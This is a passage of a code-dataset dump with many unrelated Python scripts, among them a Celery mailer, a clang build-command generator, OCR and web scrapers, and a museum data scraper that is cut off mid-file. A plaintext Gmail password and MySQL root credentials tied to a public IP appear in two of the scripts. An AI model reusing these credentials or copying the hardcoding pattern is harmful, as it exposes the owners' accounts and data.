session.install(\"pytest\")\n session.run(\"pytest\")\n","sub_path":"noxfile.py","file_name":"noxfile.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47829864","text":"from celery import Celery\nfrom celery import shared_task\nfrom time import sleep\nimport yagmail\n\n\napp = Celery(\n 'tasks',\n backend='redis://localhost',\n broker='redis://localhost',\n)\n\n@shared_task\ndef send(email, subject, body):\n receiver 
= email\n subject = subject\n body = body\n password = \"peryag888\"\n\n yag = yagmail.SMTP(\"peryagtest@gmail.com\")\n yag.send(\n to=receiver,\n subject=subject,\n contents=body, \n )\n\n\n\n","sub_path":"loginapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610097321","text":"#!/usr/bin/env python3\n\nfrom pathlib import Path\nfrom os import path\nimport argparse\nimport sys\nimport shutil\n\nMYDIR = path.dirname(path.abspath(__file__))\nARCHMAP = {\n \"amd64\": [\"--target=x86_64-pc-linux-gnu\"],\n \"arm64\": [\"--target=aarch64-linux-gnu\", \"-isystem/usr/aarch64-linux-gnu/include\"],\n \"x86\": [\"--target=i686-linux-gnu\"],\n \"armv7\": [\"--target=arm-linux-gnueabihf\", \"-march=armv7a\", \"-isystem/usr/arm-linux-gnueabihf/include\"],\n}\n\nEXTRA_OPTIONS = [\n \"-O1\", # do some basic opts\n \"-ggdb\", # emit debug info\n \"-pipe\", # use less filesystem\n \"-w\", # ignore warnings\n]\n\n\ndef emit_mk_dir(of, dstdir):\n of.write(f\"mkdir -p {dstdir}\\n\")\n\n\ndef emit_clang_cmdline(of, clang, special_opts, arch, dstfile, srcfile, suffix):\n cmd_line = [clang]\n # Options every clang invocation gets\n cmd_line.extend(EXTRA_OPTIONS)\n # architecture specific args\n cmd_line.extend(ARCHMAP[arch])\n # special arguments for this specific invocation\n if special_opts:\n cmd_line.extend(special_opts)\n # Generate bitcode and not do a full compilation\n cmd_line.extend([\"-o\", str(dstfile.with_suffix(suffix)), str(srcfile)])\n\n # write out the cmdline\n of.write(\" \".join(cmd_line))\n of.write(\"\\n\")\n\n\ndef emit_clang_bc_cmdline(of, clang, arch, dstfile, srcfile):\n emit_clang_cmdline(\n of, clang, [\"-emit-llvm\", \"-c\"], arch, dstfile, srcfile, suffix=\".bc\"\n )\n\n\ndef emit_clang_elf_cmdline(of, clang, arch, dstfile, srcfile):\n # emit a \"-c\" since these source files do not have a `main`\n emit_clang_cmdline(of, clang, [\"-c\"], arch, dstfile, srcfile, suffix=\".elf\")\n\n\ndef emit_mkdir_command(\n of, source_file, source_dir_base, dest_dir_base, previous_dir=None\n):\n # convert source filename to one in the destination directory tree\n idx = source_file.parts.index(source_dir_base)\n new_path = dest_dir_base.joinpath(*source_file.parts[idx + 1 :])\n\n # emit the mkdir command to create the output directory\n # skip emitting duplicates, since many files share the same subdirectory\n new_dir = new_path.parent\n if new_dir != previous_dir:\n emit_mk_dir(of, new_dir)\n return new_dir\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--clang\",\n default=\"clang-11\",\n help=\"Which clang binary to run, default clang-11\",\n )\n parser.add_argument(\n \"--source\", default=f\"{MYDIR}/../source\", help=\"where to look for source files\"\n )\n parser.add_argument(\n \"--dest\", default=f\"{MYDIR}/../compiled\", help=\"where to put output\"\n )\n parser.add_argument(\n \"--emit-bitcode\",\n default=False,\n action=\"store_true\",\n help=\"Emit commands to compile to bitcode\",\n )\n parser.add_argument(\n \"--emit-binaries\",\n default=False,\n action=\"store_true\",\n help=\"Emit commands to compile binaries\",\n )\n parser.add_argument(\n \"-o\",\n \"--outfile\",\n default=\"/dev/stdout\",\n help=\"Output file to write, default to stdout\",\n )\n\n args = parser.parse_args()\n\n if not args.emit_bitcode and not args.emit_binaries:\n sys.stderr.write(\"Nothing to do.\\n\")\n 
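# (illustrative usage, added; not part of the original script) e.g.:\n # ./generate_compile_commands.py --emit-bitcode -o build.sh && sh build.sh\n 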
sys.stderr.write(\"Please specify --emit-bitcode or --emit-binaries\\n\")\n sys.exit(1)\n\n if shutil.which(args.clang) is None:\n sys.stderr.write(f\"Could not find clang command: {args.clang}\\n\")\n sys.exit(1)\n\n source_path = Path(args.source)\n # find every .c file\n sources = list(source_path.rglob(\"*.c\"))\n\n # find the last part of the source path, so that we can replicate source tree in destination dir\n last_source_part = source_path.parts[-1]\n\n if 0 == len(sources):\n sys.stderr.write(f\"Could not find any C source in {args.source}\\n\")\n sys.exit(1)\n\n worklist = []\n previous_dir = None\n\n output_styles = []\n emit_functions = {}\n if args.emit_bitcode:\n output_styles.append(\"bitcode\")\n emit_functions[\"bitcode\"] = emit_clang_bc_cmdline\n if args.emit_binaries:\n output_styles.append(\"binaries\")\n emit_functions[\"binaries\"] = emit_clang_elf_cmdline\n\n with open(args.outfile, \"w\") as of:\n for (arch, cmdargs) in ARCHMAP.items():\n for outstyle in output_styles:\n destination = Path(f\"{args.dest}/{outstyle}/{arch}\")\n for source in sources:\n previous_dir = emit_mkdir_command(\n of, source, last_source_part, destination, previous_dir\n )\n # save the arch/source/dest pair to avoid recomputing it\n worklist.append(\n (\n arch,\n previous_dir.joinpath(source.name),\n source,\n outstyle,\n )\n )\n\n # emit clang command lines to output bitcode\n for item in worklist:\n emit_functions[item[3]](\n of, args.clang, arch=item[0], dstfile=item[1], srcfile=item[2]\n )\n","sub_path":"scripts/generate_compile_commands.py","file_name":"generate_compile_commands.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52825219","text":"import numpy as np\n\n\ndef solve(y, x, x_pred):\n # x transpose\n x_dash = x.T\n # product of x_dash and x\n X = x_dash.dot(x)\n # inverse of X\n X_inv = np.linalg.inv(X)\n # producet of X_inv and x_dash\n X_final = X_inv.dot(x_dash)\n # product of X_final and y i.e B\n B = X_final.dot(y)\n # calculate the y_pred\n y_pred = x_pred.dot(B)\n return y_pred\n\n\ndef main():\n m, n = map(int, input().strip().split())\n y = []\n x = []\n x_pred = []\n for _ in range(n):\n *features, y_val = map(float, input().strip().split())\n x.append([1] + features)\n y.append(y_val)\n\n for _ in range(int(input())):\n features = list(map(float, input().strip().split()))\n x_pred.append([1] + features)\n\n y = np.array(y)\n x = np.array(x)\n x_pred = np.array(x_pred)\n answer = solve(y, x, x_pred)\n\n for num in answer:\n print(round(num, 2))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"HackerRank/Statistics/day9-LinearRegression.py","file_name":"day9-LinearRegression.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"365191690","text":"import pytesseract #图片转文字\nfrom PIL import Image#处理图片\nimport time#计算时间\nimport xlwt#操作excel\nimport os#遍历文件夹\nimport matplotlib.pyplot as plt#处理图片\nimport matplotlib.image as mpimg#处理图片\nimport numpy as np#处理图片\nfrom scipy import misc#处理图片\nimport xlutils.copy#操作excel\nimport xlrd#操作excel\nimport requests#爬取网站\nfrom bs4 import BeautifulSoup#爬取网站\nimport urllib.request#爬取网站\nimport re#正则\nimport sys\nimport json#python转json json转python\nimport pymongo#操作数据库\nfrom pymongo import MongoClient#操作数据库\n\na1 = '企业注册码'\na2 = '企业名称'\na3 = '类型'\na4 = '住所'\na5 = '法定代表人'\na6 ='成立时间'\na7 = '注册资本'\na8 = '营业期限'\na9 = '经营范围'\na10 = 
'登记机关'\no = 0\n\ndef get_Image(tupian):\n url = 'http://140.143.121.215:8080/'# URL to crawl\n html = requests.get(url)# send a requests GET and grab the page source\n soup = BeautifulSoup(html.text, 'lxml')# make a soup, parsed with lxml\n img = soup.findAll('li')# collect the li tags from the page source\n content = r'
  • '# regex rule: capture whatever is inside the parentheses\n\n for i in range(len(img)):# loop over the number of li tags\n img[i] = str(img[i])# take the content of img[i] and turn it into a string\n ans = re.findall(content, img[i], re.S | re.I)# regex-match img[i] against content and collect every string that qualifies\n dizhi = 'http://140.143.121.215:8080/' + ans[0]# the prefix of every image URL is fixed, so fixed prefix + matched string gives the image's source address\n urllib.request.urlretrieve(dizhi, tupian+'/'+ str(i + 1) + '.png')# save the image locally\n\n\ndef file_name(filename): # process the given folder in sorted order\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)# create an excel workbook,\n sheet = book.add_sheet('photo', cell_overwrite_ok=True)# add a sheet named photo to the new workbook\n sheet.write(0, 0, a1)# write a1 at cell 0,0\n sheet.write(0, 1, a2)\n sheet.write(0, 2, a3)\n sheet.write(0, 3, a4)\n sheet.write(0, 4, a5)\n sheet.write(0, 5, a6)\n sheet.write(0, 6, a7)\n sheet.write(0, 7, a8)\n sheet.write(0, 8, a9)\n sheet.write(0, 9, a10)\n book.save(filename + 'test.xls')# save the workbook; apart from this header row it is still completely blank\n for a,b,c in os.walk(filename):# walk the folder that was passed in\n # print(a) # current path\n # print(b) # all subdirectories under the current path\n # print(c) # all non-directory files under the current path\n list1=[]# create list list1\n list2=[]\n for i in c:\n temp = re.compile(r'\\d+')# the images were saved under numeric names, so use the regex temp to match the numerically named images in the folder\n res = re.findall(temp,i)# regex match: find the substrings of i that satisfy temp\n for j in res:\n list1.append(j)# append the matched string to list1\n\n for i in list1:# iterate over list1\n sum=int(i)# file names are strings by default and must be cast to int before numeric comparison: as strings 11<2, so the images (and therefore the extracted information) would not come out in order\n list2.append(sum)# append the value of sum to list2\n sum=sorted(list2)# let sorted order list2\n for i in sum:\n temp = str(i)+'.png'# sum is in order now, but the numbers must be turned back into strings to match the files in the folder\n temp = filename+'/'+temp# file name plus the local path gives the image's absolute path, used for opening it\n\n text = pytesseract.image_to_string(Image.open(temp), lang='chi_sim')# image to text,\n b = text[12:30] # company registration number\n d = text[42:68] # name\n e = text[76:110] # type\n f = text[118:152]# address\n g = text[164:170]# legal representative\n h = text[180:192] # date founded\n m = text[201:216]# registered capital\n j = text[236:440]# business scope\n k = text[450:470]# registration authority\n x = h+'至今'\n\n\n\n rb = xlrd.open_workbook(filename+'test.xls')# open an excel file with xlrd\n wb = xlutils.copy.copy(rb)# to avoid overwriting the existing information, copy the original file and take over its contents\n ws = wb.get_sheet(0)# from the opened workbook, get its first sheet\n ws.write(i, 0, b)# store the content of b at cell i,0\n ws.write(i, 1, d)\n ws.write(i, 2, e)\n ws.write(i, 3, f)\n ws.write(i, 4, g)\n ws.write(i, 5, h)\n ws.write(i, 6, i)\n ws.write(i, 7, x)\n ws.write(i, 8, j)\n ws.write(i, 9, k)\n wb.save(filename + r'/test.xls')# save the excel file, overwriting the old one while still keeping its earlier information\n return\n\n\ndef file_name1(filename1): # process the given folder in sorted order\n # book = xlwt.Workbook(encoding='utf-8', style_compression=0)# create an excel workbook,\n # sheet = book.add_sheet('photo', cell_overwrite_ok=True)# add a sheet named photo to the new workbook\n # sheet.write(0, 0, a1)# write a1 at cell 0,0\n # sheet.write(0, 1, a2)\n # book.save(filename1+'test.xls')# save the workbook; apart from this header row it is still completely blank\n\n for a,b,c in os.walk(filename1):\n # print(a) # current path\n # print(b) # all subdirectories under the current path\n # print(c) # all non-directory files under the current path\n list1=[]\n list2=[]\n for i in c:\n temp = re.compile(r'\\d+')# the images were saved under numeric names, so use the regex temp to match the numerically named images in the folder\n res = re.findall(temp,i)# regex match: find the substrings of i that satisfy temp\n for j in res:\n list1.append(j)# append the matched string to list1\n\n for k in list1:# iterate over list1\n sum=int(k)# file names are strings by default and must be cast to int before numeric comparison: as strings 11<2, so the images (and therefore the extracted information) would not come out in order\n list2.append(sum)# append the value to list2\n sum=sorted(list2)# let sorted order list2\n for j in sum:\n temp = str(j)+'.png'# sum is in order now, but the numbers must be turned back into strings to match the files in the folder\n temp = filename1+temp# file name plus the local path gives the image's absolute path, used for opening it\n le = mpimg.imread(temp)# read the image\n le = le[0:76, 0:500, :]# crop the image by pixel range, keeping only the top two lines,\n le2 = misc.imresize(le, 0.99)# rescale the image\n plt.imshow(le2)# show the image\n plt.axis('off')# switch the x/y axes off so they are not drawn\n plt.savefig('test.png')# save this figure\n 
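# (note added, hedged): keep savefig before plt.show(); show() can release the current\n # figure on some backends, and a savefig issued afterwards would write a blank file.\n 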
plt.show()\n # binarization: color to grayscale, grayscale to binary, then recognize the binary image\n im = Image.open('test.png')# open the image that is to be recognized\n imgry = im.convert('L')# convert the image to grayscale\n imgry.show()\n threshold = 140# set the threshold value\n table = []# lookup table\n for wo in range(256):\n if wo < threshold:\n table.append(0)\n else:\n table.append(1)\n\n out = imgry.point(table, '1')# build the binary image; '1' is the 1-bit mode\n out.save('test.png')# save the image\n out.show()\n\n\n text = pytesseract.image_to_string(Image.open('test.png'), lang='chi_sim')# image to text,\n d = text[12:30] # company registration number\n f = text[40:] # name\n\n rb = xlrd.open_workbook(filename1 + 'test.xls')# open an excel file with xlrd\n wb = xlutils.copy.copy(rb)# to avoid overwriting the existing information, copy the original file and take over its contents\n ws = wb.get_sheet(0)# from the opened workbook, get its first sheet\n ws.write(j, 0, d)# store the content of d at cell j,0\n ws.write(j, 1, f)\n wb.save(filename1 + r'/test.xls')# save the excel file, overwriting the old one while still keeping its earlier information\n plt.close('all')# close the figures, otherwise each loop iteration's recognition image would stack on top of the last\n return\n\n\ndef cunku():\n # connect to the database\n client = MongoClient('localhost', 27017)# connect to the database: host + port\n db = client['test']# use the test database\n\n ta = db['student']# use the student collection\n ta.drop()# drop the collection\n\n data = xlrd.open_workbook('E:/meishi/test.xls')# open the excel file that will be imported\n table = data.sheets()[0]# get the first sheet of the workbook\n rowstag = table.row_values(0)# take the sheet's first row as the keys\n nrows = table.nrows# number of rows in the sheet\n returnData = {}# dict\n for i in range(1, nrows):# loop from 1 up to the row count (exclusive)\n returnData[i] = json.dumps(dict(zip(rowstag, table.row_values(i))))# encode the python value as json, forming one record\n returnData[i] = json.loads(returnData[i])# decode the json back into a python value, i.e. json decoding\n ta.insert(returnData[i])# insert the record into the database\n\n\ndef yemian():\n print('---------------------------------')\n print('-----1-----------爬虫--------------')\n print('-----2--------识别图片全部---------')\n print('-----3------识别图片部分----------')\n print('-----4-----选择存储到数据库-------')\n\n\nif __name__ == '__main__':\n yemian()\n shuzi = int(input('请输入你心仪的数字'))\n if shuzi == 1:\n tupian = input('麻烦在输入一下图片保存地址')\n get_Image(tupian)\n if shuzi == 2:\n filename = input('这就牛逼了,你输个地址就能把你地址里的文字转成图片')\n file_name(filename)\n if shuzi == 3:\n filename1 = input('这个比上一个稍微虚点,只能识别部分')\n file_name1(filename1)\n if shuzi == 4:\n y = input('你要不要存数据库啊,mongodb很牛逼的啊(y/n)')\n if y == 'y':\n cunku()\n else:\n print('不存还选我,浪费时间')","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":10177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"561326578","text":"import unicodecsv as csv\r\nimport pandas as pd\r\n\r\n# These columns may vary depending on what pops you have added to the game\r\n# Change as necessary\r\nid_column = \"PROVID\"\r\nname_column = \"NAME\"\r\nculture_column = \"CULTURE\"\r\nreligion_column = \"Religion\"\r\ntradegoods_column = \"TRADEGOOD\"\r\ncivilization_column = \"INDUSTRIALISATION\"\r\nbarbarian_column = \"unused\"\r\nprovince_rank_column = \"PROVINCE_RANK\"\r\narea_column = \"AREA\"\r\nterrain_column = \"TERRAIN\"\r\n# Pop values\r\ncitizen_column = \"unused\"\r\nslaves_column = \"slaves\"\r\ntribesmen_column = \"tribesmen\"\r\n# Pops for the 1815 mod\r\nindentured_column = \"indentured\"\r\nlower_strata_column = \"lower_strata\"\r\nmiddle_strata_column = \"middle_strata\"\r\nupper_strata_column = \"upper_strata\"\r\nproletariat_column = \"proletariat\"\r\n# Extra minority pops, beginning with pop type column\r\nextra_pop1 = 21\r\nextra_pop2 = 25\r\nextra_pop3 = 29\r\nextra_pop4 = 33\r\nextra_pop5 = 37\r\nextra_pop6 = 41\r\nextra_pop7 = 45\r\nextra_pops = [extra_pop1, extra_pop2, extra_pop3, extra_pop4, extra_pop5, extra_pop6, extra_pop7]\r\n# Add these values to above minority pop columns to get corresponding 
data\r\nculture = 1\r\nreligion = 2\r\nsize = 3\r\n\r\n# Data validation for pop types\r\nvalid_pops = [\"lower_strata\",\"proletariat\",\"middle_strata\",\"upper_strata\",\"slaves\",\"tribesmen\",\"indentured\"]\r\n\r\nterrain_file = open(\"province_terrain/00_province_terrain.txt\",encoding=\"utf=8\")\r\n\r\n# OUTPUT FILE\r\nbuilding_list = open(\"building_list.txt\",\"w\",encoding=\"utf=8\")\r\n# INPUT FILE\r\nsetup_csv = open(\"province_setup.csv\", \"rb\")\r\n#reader = csv.reader(setup_csv, delimiter=\";\")\r\nreader = pd.read_csv(setup_csv, sep=';')\r\nreader = reader.fillna(\"\") # Fill all NaN values with empty strings\r\n\r\n# Only list provinces with city status, because we're only going to give them buildings\r\n#reader = reader[reader.PROVINCE_RANK != 0]\r\n\r\n# Get the total population, N.B. this only gets main culture pops and does not include extra pops.\r\ndef get_total_population(row):\r\n try:\r\n total_population = int(row.indentured) + int(row.slaves) + int(row.tribesmen) + int(row.lower_strata) + int(row.middle_strata) + int(row.upper_strata) + int(row.proletariat)\r\n for extra_pop in extra_pops:\r\n if row[extra_pop].replace(\" \",\"_\") in valid_pops:\r\n total_population = total_population + row[extra_pop+size]\r\n return total_population\r\n except:\r\n return 0\r\n\r\ndef write_buildings():\r\n with building_list as f:\r\n f.write(\"### BEGIN GENERATED BUILDINGS\\n\\n\")\r\n for row in reader.itertuples():\r\n total_population = get_total_population(row)\r\n\r\n if total_population > 0:\r\n \r\n f.write(\" \" + str(row.PROVID) + \" = {\\n\" )\r\n residential = str(int(round(int(total_population/10)*0.8)*((3*int(row.INDUSTRIALISATION)) / 100)))\r\n if int(residential) > 0:\r\n f.write(\" URB_residential_district = \" + residential + \"\\n\")\r\n administration = str(int(round(int(row.middle_strata) / 10))) \r\n if int(administration) > 0:\r\n f.write(\" URB_administration_district = \" + administration + \"\\n\")\r\n commerce = str(int(round((int(row.middle_strata) + int(row.upper_strata)) / 10)))\r\n if int(commerce) > 0:\r\n f.write(\" URB_commerce_district = \" + commerce + \"\\n\") \r\n cultural = str(int(round((int(row.middle_strata) + int(row.upper_strata)) / 13)))\r\n if int(cultural) > 0:\r\n f.write(\" URB_cultural_district = \" + cultural + \"\\n\") \r\n school = str(int(round(int(row.middle_strata) / 10)))\r\n if int(school) > 0:\r\n f.write(\" EDU_school = \" + school + \"\\n\") \r\n sewer = str(int(round((total_population/30)*(int(row.INDUSTRIALISATION) / 100))))\r\n if int(sewer) > 0:\r\n f.write(\" INF_sewer_infrastructure = \" + sewer + \"\\n\" )\r\n RGO = str(int(round(2 *((0.25*int(row.INDUSTRIALISATION)) ))))\r\n if int(RGO) > 0:\r\n f.write(\" IND_resource_gathering_operation = \" + RGO + \"\\n\" )\r\n depot = str(int(round((total_population/20)*((3*int(row.INDUSTRIALISATION)) / 50))))\r\n if int(depot) > 0:\r\n f.write(\" INF_depot = \" + depot + \"\\n\" )\r\n hospital = str(int(round((int(row.middle_strata)/5)*(int(row.INDUSTRIALISATION) / 100))))\r\n if int(hospital) > 0:\r\n f.write(\" INF_hospital = \" + hospital + \"\\n\" )\r\n f.write(\" }\\n\")\r\n \r\n f.write(\"###END GENERATED BUILDINGS\")\r\n \r\n\r\nwrite_buildings()\r\n","sub_path":"common/buildings_generator.py","file_name":"buildings_generator.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"489079429","text":"# Copyright (C) 2020 GreenWaves Technologies, SAS\n\n# This program 
is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nfrom .utils import at_bits\n\nGEN_MULCONV_POOL_RELU = \"CNN_ConvolutionMulBiasPoolReLU\"\n\ndef gen_at_mulconv_pool_relu(code_block, name, in_q, out_q,\n filt_q, bias_q, mul_biases_q, in_dim, out_dim,\n at_conv, at_pool, at_active, gen_ctrl=None, at_ver=3):\n if gen_ctrl is None:\n gen_ctrl = \"0\"\n else:\n gen_ctrl = gen_ctrl.ctrl_name\n\n if at_ver < 3:\n raise NotImplementedError(\"mulbias before ver 3 not supported\")\n\n code_block.write('{}(\"{}\", {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, 1, 1, 1, 1, 1, {}, {}, {}, {},',\n GEN_MULCONV_POOL_RELU, name, gen_ctrl,\n at_bits(in_q), at_bits(filt_q), at_bits(\n bias_q), at_bits(mul_biases_q), at_bits(out_q),\n in_q.q, filt_q.q, bias_q.q, mul_biases_q.q, out_q.q,\n in_dim.c, out_dim.c, in_dim.w, in_dim.h)\n code_block.indent()\n code_block.write('{}, {}, {}, {}, {}, {}, {}, {},',\n at_conv.ConvOper, at_conv.Fcx, at_conv.Fcy,\n at_conv.Dcx, at_conv.Dcy, at_conv.Scx, at_conv.Scy,\n at_conv.ConvPad)\n code_block.write('{}, {}, {}, {}, {}, {}, {}, {}, {});',\n at_pool.PoolOper, at_pool.Fpx, at_pool.Fpy,\n at_pool.Dpx, at_pool.Dpy, at_pool.Spx, at_pool.Spy,\n at_pool.PoolPad, at_active.ReLUOper)\n code_block.deindent()\n","sub_path":"tools/nntool/generation/at_generators/cnn_convolution_mulbias_pool_relu.py","file_name":"cnn_convolution_mulbias_pool_relu.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"521746109","text":"import os\n\nfrom skimage import data, io, filters\n\nimport numpy as np\n\n\nimage = io.imread('pic1.png')\n#print(image[0])\n#print(len(image[0]))\n#print(len(image))\n#print(type(image[0][0][0]))\n#print(np.mean(image[1]))\n#filename = os.path.join(skimage.data_dir, '1pic.png')\n#moon = io.imread(filename)\n\nnewimage = []\n\nfor i in range(0,len(image)):\n\tfor j in range(0,len(image[i])):\n\t\tbrightness = float(image[i][j][0])*(0.3) +float(image[i][j][1])*(0.59) +float(image[i][j][2])*(0.11)\n\t\tnewimage += [brightness]\n\n#print(newimage)\n#print(image[0][0])\n\ntemp = [0]*(4000)\ncount = 0;\nindex = 0;\nfor i in range(0,200*200):\n\ttemp[index] = temp[index] + newimage[i]\n\tcount = count + 1\n\tif count == 10:\n\t\tcount = 0\n\t\tindex = index + 1\nindex = 0\ncount = 0\nlast = [0]*400\nfor i in range(0,4000):\n\tlast[index] = last[index] + temp[i]\n\tindex = index + 1\n\tif((index%20) == 0):\n\t\tindex = index - 20\n\tif((i != 0)&(i%200 == 0)):\n\t\tindex = index + 20\n\nwith open(\"anotherdata.txt\", \"w\") as myfile:\n\tmyfile.close()\n\nwith open(\"anotherdata.txt\", \"a\") as myfile: #destination file to add to\n\t#myfile.write(\"appended text\")\n\tfor item in last:\n\t\tmyfile.write(str(item) + 
\",\")\n\tmyfile.write(\"\\n\")\n\nprint('done')\n\n#print(last)","sub_path":"k-means/scanimage.py","file_name":"scanimage.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"236131839","text":"from selenium import webdriver\nimport time\n\n\nclass UserSpider:\n __browser = None\n\n def __init__(self, offset):\n self.__offset = offset\n self.__getbrowser()\n\n def __getbrowser(self):\n url = \"https://www.douyu.com/\" + str(self.__offset)\n self.__browser = webdriver.Chrome()\n self.__browser.get(url)\n time.sleep(6)\n\n # 传入浏览器对象,得到数据\n def getdata(self):\n title = self.__browser.find_element_by_class_name('layout-Player-title')\n\n playtitle = title\\\n .find_element_by_class_name('Title-headlineH2')\\\n .text\n headimg = title\\\n .find_element_by_class_name('Title-anchorPicImg')\\\n .get_attribute('src')\n follownum = title\\\n .find_element_by_class_name('Title-followNum')\\\n .text\n weenrank = title\\\n .find_element_by_class_name('WeekRankTitle-upDownBoxMiddleConRank')\\\n .text\n hot = title\\\n .find_element_by_class_name('Title-anchorText')\\\n .text\n anchorname = title\\\n .find_element_by_class_name('Title-anchorNameH1')\\\n .text\n tagsnode1 = title\\\n .find_elements_by_class_name('Title-categoryItem')\n tagsnode2 = title\\\n .find_elements_by_class_name(\"AnchorImpress-listItemTag\")\n tagsnode3 = title\\\n .find_elements_by_class_name(\"Title-official\")\n\n tags = []\n for item in tagsnode1:\n a = item.text\n tags.append(a)\n for item in tagsnode2:\n a = item.text\n tags.append(a)\n for item in tagsnode3:\n a = item.text\n tags.append(a)\n self.__browser.close()\n\n return {\n 'playtitle': playtitle,\n 'anchorname': anchorname,\n 'headimg': headimg,\n 'hot': hot,\n 'follownum': follownum,\n 'weekrank': weenrank,\n 'tags': tags\n }\n","sub_path":"Flask/envir/Scripts/Flask/spider/UserSpider.py","file_name":"UserSpider.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281003449","text":"# preprocessing data second phase (gExpressions2.pickle, and gNames2.pickle)\n# it eliminates genes if RMA values of more than 90% of them are less than 6.\n\nimport pickle\nimport numpy as np\n\ndef notSigExpressed(aList, numCell, prop, magicN):\n\tcount=0\n\tfor i in aList:\n\t\tif inumCell*prop:\n\t\treturn True\n\telse:\n\t\treturn False\n\ngExpressions=pickle.load(open('./prePickles/gExpressions.pickle','r'))\ngNames=pickle.load(open('./prePickles/gNames.pickle','r'))\n\nnumCell=gExpressions.shape[1]\nwhichRowFiltered=[]\nfor rawI, g in enumerate(gExpressions):\n\tif notSigExpressed(g,numCell,0.9,6):\n\t\twhichRowFiltered.append(rawI)\n\nwhichRowNotFiltered=set(range(gExpressions.shape[0]))\nwhichRowNotFiltered-=set(whichRowFiltered)\nwhichRowNotFiltered=list(whichRowNotFiltered)\nwhichRowNotFiltered.sort()\n\ngExpressions2=gExpressions[whichRowNotFiltered]\ngNames2=gNames[whichRowNotFiltered]\n\npickle.dump(gExpressions2,open('./prePickles/gExpressions2.pickle','w'))\npickle.dump(gNames2,open('./prePickles/gNames2.pickle','w'))\n","sub_path":"dataPrepro2.py","file_name":"dataPrepro2.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375277795","text":"\narchivo = open(\"quijote.txt\",\"r\")\ndic = {}\nfor lines in archivo.readlines():\n for palabra in lines.split():\n if palabra in dic:\n 
dic[palabra]= dic[palabra]+1\n        else:\n            dic[palabra]= 1\n\nprint(dic)\n# Still missing: strip punctuation marks from the words\n","sub_path":"cuentapalabras.py","file_name":"cuentapalabras.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"398163900","text":"\"\"\"Solution.\n\nHackerRank > Algorithms > Warmup > Compare the Triplets.\n\"\"\"\n\n\ndef compareTriplets(a, b):\n    \"\"\"Problem solution.\"\"\"\n    ap, bp = 0, 0\n    for i in range(len(a)):\n        ap += 1 if a[i] > b[i] else 0\n        bp += 1 if b[i] > a[i] else 0\n    return [ap, bp]\n","sub_path":"hackerrank/algorithms/warmup/Compare the Triplets/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329378959","text":"import requests\nimport re\nimport bs4\nfrom bs4 import BeautifulSoup\nimport pymysql\n\nheaders ={\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0'\n    }\n\n# global variables\nglobal mid,eid,oid\nmid = int(0)\neid = int(0)\noid = int(0)\n\nmuseum_info = {}\n\nclass ConnMysql(object):\n    def __init__(self):\n        # connect to the database\n        self.db = pymysql.connect(host='39.97.241.101',\n                             port=3306,\n                             database='testsitedb',\n                             user='root',\n                             password='root',\n                             charset='utf8')\n        self.cursor = self.db.cursor()\n    def insert(self,dict1):\n        global mid,eid,oid\n        # insert the scraped data into the database tables\n        sql_1 = \"insert into museums(name,imgurl,mobile,address,introduction,opentime) values(%s,%s,%s,%s,%s,%s)\"\n        for i in dict1[\"1\"]: \n            data_1 = [i[\"name\"],i[\"img\"],i['number'],i['location'],i['description'],i['opentime']]\n            try:\n                self.cursor.execute(sql_1,data_1)\n                self.db.commit() # commit the transaction\n            except:\n                self.db.rollback()\n        sql_2 = \"insert into exhibitions(name,imgurl,introduction,mname) values(%s,%s,%s,%s)\"\n        for i in dict1[\"2\"]:\n            data_2 = [i[\"name\"],i[\"img\"],i['description'],i[\"mname\"]]\n            try:\n                self.cursor.execute(sql_2,data_2)\n                self.db.commit() # commit the transaction\n            except:\n                self.db.rollback()\n\n        sql_3 = \"insert into collections(name,imgurl,introduction,mname) values(%s,%s,%s,%s)\"\n        for i in dict1[\"3\"]:\n            data_3 = [i[\"name\"],i[\"img\"],i['description'],i[\"mname\"]]\n            try:\n                self.cursor.execute(sql_3,data_3)\n                self.db.commit() # commit the transaction\n            except:\n                self.db.rollback()\n\n        sql_4 = \"insert into educations(name,imgurl,introduction,time,mname) values(%s,%s,%s,%s,%s)\"\n        for i in 